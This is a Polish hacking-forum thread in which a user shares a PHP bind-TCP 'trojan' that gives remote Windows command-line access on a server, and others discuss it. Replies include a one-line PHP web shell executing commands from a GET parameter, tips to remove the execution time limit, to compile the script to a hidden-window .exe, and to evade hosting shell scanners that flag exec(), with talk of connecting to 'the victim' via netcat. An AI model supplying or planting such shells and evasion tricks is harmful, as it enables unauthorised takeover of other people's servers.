forum.haker.edu.pl

Siema chcialem sie podzielic bardzo prostym ale niezwykle efektywnym trojanem. Jest to serwer, wiec oczywiscie musi byc odpalony po stronie serwera udostepnia nam on tryb komendowy systemu windows servera, tak wiec po nawiazaniu polaczenia tcp jestesmy w stanie wysylac dowolne komendy cmd. Proste ale niezwykle potezne narzedzie.

Fajne i proste jak tak rzucam na to okiem. Brakuje moim zdaniem pewnej rzeczy. Wydaje mi się, że większość serwerów domyślnie ma ustawione wykonywanie pliku PHP na 30 sekund. Przydałoby się dodać: Parametr to liczba sekund wykonania skryptu. Zero ustawia na nieskończone wykonanie skryptu (aż do przerwania go w przeglądarce www). Naprawdę dobry skrypt do edukacji innych, jednak mam pewną wątpliwość czy nie łatwiej nie korzystać z socketów i zrobić po prostu: Nie znam za dobrze PHP ale skoro tutaj jest adres IP i PORT to czy ja dobrze rozumiem że ten socket łączy się z nami (192.168.10.151) bo dalej rozumiem jak komunikacja przebiega? Bo jeśli tak jest to jest to tzn. reverse_tcp czyli ofiara łączy się z nami. Lepiej zrobić bind_tcp czyli, że oczekuje na połączenia od osób i jak ktoś się połączy (np: za pomocą zwykłego netcat lub telnet na tym porcie 448 to oddaje mu do usług cmd). Może Cię zainteresuje jeszcze to (jest film): http://haker.edu.pl/2015/10/26/php-curl-upload-pliku/

Jeśli tak nie jest i jest to adres IP serwera to można je dynamicznie sobie pobrać: Dzięki za skrypt!

F3nix pisze:Fajne i proste jak tak rzucam na to okiem. Brakuje moim zdaniem pewnej rzeczy. Wydaje mi się, że większość serwerów domyślnie ma ustawione wykonywanie pliku PHP na 30 sekund. Przydałoby się dodać:

Kod: Zaznacz cały

set_time_limit (0);

Parametr to liczba sekund wykonania skryptu. Zero ustawia na nieskończone wykonanie skryptu (aż do przerwania go w przeglądarce www).

masz racje, jednak u mnie jest to domyslnie ustawione na no limit(w configu php), wiec nie musze tego deklarowac w kazdym skrypcie. Ale oczywiscie zapomnialem tego wspomniec .

F3nix pisze: Naprawdę dobry skrypt do edukacji innych, jednak mam pewną wątpliwość czy nie łatwiej nie korzystać z socketów i zrobić po prostu:

Kod: Zaznacz cały

<?php
if ($_GET['cmd'])
   exec($_GET['cmd'];
?>

Mozna GETem ale wtedy konieczna jest odpalona przegladarka internetowa. Moj skrypt dziala rowniez z poziomu konsoli(jak uruchomisz trybem konsolowym skrypt). Dla lepszego efektu mozna nawet skompilowac go do .exe(np. bambompile) i odpalic w trybie niewidzialnego okna cmd . Moze napisze tutorial o tym dla potomnych.

F3nix pisze: Nie znam za dobrze PHP ale skoro tutaj jest adres IP i PORT to czy ja dobrze rozumiem że ten socket łączy się z nami (192.168.10.151) bo dalej rozumiem jak komunikacja przebiega? Bo jeśli tak jest to jest to tzn. reverse_tcp czyli ofiara łączy się z nami. Lepiej zrobić bind_tcp czyli, że oczekuje na połączenia od osób i jak ktoś się połączy (np: za pomocą zwykłego netcat lub telnet na tym porcie 448 to oddaje mu do usług cmd). Może Cię zainteresuje jeszcze to (jest film): http://haker.edu.pl/2015/10/26/php-curl-upload-pliku/

Jeśli tak nie jest i jest to adres IP serwera to można je dynamicznie sobie pobrać:

Kod: Zaznacz cały

$_SERVER['SERVER_ADDR'];

Dzięki za skrypt!

Oh tutaj troche moja niechlujnosc. To jest moj stary skrypt wiec postanowilem sie nim podzielic nie myslalem za bardzo o komentowaniu i wyjasnianiu o co chodzi(moj blad). Skrypt dziala właśnie jako bind-tcp. Dokladnie dziala jak napisales oczekuje na polaczenie na danym porcie (w tym wypadku 448) i po otrzymaniu go udostepnia nam konsole a mowiac precyzyjniej kazdwy wyslany pakiet jest trimowany i wpisywany jako polecenie konsoli.
Adres IP to poprostu adres servera ktory nasluchuje. I tutaj jeszcze raz moj blad, testowalem to na swoich komputerach i wtedy nawet o tym nie pomyslalem. Oczywiscie trzeba dynamicznie pobierac(chyba, ze znasz ip ofiary przed atakiem), gdzies w mojej bardziej zaawansowanej wersji tego skryptu obslugujacej multiwatkowosc wszystko to popoprawialem, moze sie kiedys podziele nim rowniez .

Z wielka checia przyjze sie temu artykulowi, z curclem mialem troche doczynienia ale nigdy jakos na dluzsza mete sie nie zajmowalem, dzieki .

Tak abstrahując są pewne sztuczki na ukrycie pewnych nieciekawych funkcji w kodzie bo niestety lub na szczęście większość skanerów shelli na hostingu wykrywa wywołanie funkcji exec().

BTW: i tak najlepszy fragment kodu to:

W sumie też poszukam starych gratów na starych nośnikach i może coś w najbliższym czasie wrzucę. Potem szuka się w Internecie rozwiązania, żeby nie wymyślać koła na nowo i lipa nima.

Dlatego oplaca sie kompilowac te skrypty, kodu maszynowego mi nic nie wykryje (no chyba, ze posiadaja zaawansowane skanery ktore nie zezwalaja na dostep do jakichkolwiek sieciowych aspektow systemu danej aplikacji).

PS: Lubie trzymac moje programy w humorystycznym brzemieniu, zawsze uzywam nazw baz danych, lub komentarzy takich zeby sie z powagi nie zabic

Tylko wtedy pewnie jak skompilujesz to Linuksowcy pożegnają się z Twoim programem...

Proszę mnie uczyć , jak korzystać z tego

Najpioerw naucz się programowania w PHP z książki (dostępne na helion.pl) lub kursów php następnie wróć i zapewne już takiego pytania nie zadasz. Ciężko powiedzieć coś o tym co jest tak naprawdę dosyć podstawową wiedzą.

Dizzywarrior123 pisze:Proszę mnie uczyć , jak korzystać z tego

Niedługo zamierzam napisać na blogu haker.edu.pl tutorial z programowania sieciowego. Omówię w nim podstawową wiedzę na temat socketów, portów i ogólnej komunikacji między komputerami za pośrednictwem sieci. Oczywiście będzie to tutorial dla tych którzy posiadają już podstawową wiedzę z języków programowania, dlatego tak jak f3nix wspomniał, warto zapoznać się z podstawami, zanim zabierze się za bardziej skomplikowane rzeczy.

Plik w ktorym to wpisujesz musi miec rozszerzenie .php lub .php3 lub .phtml, wowczas bedzie traktowanyprzez serwer jako skrypt.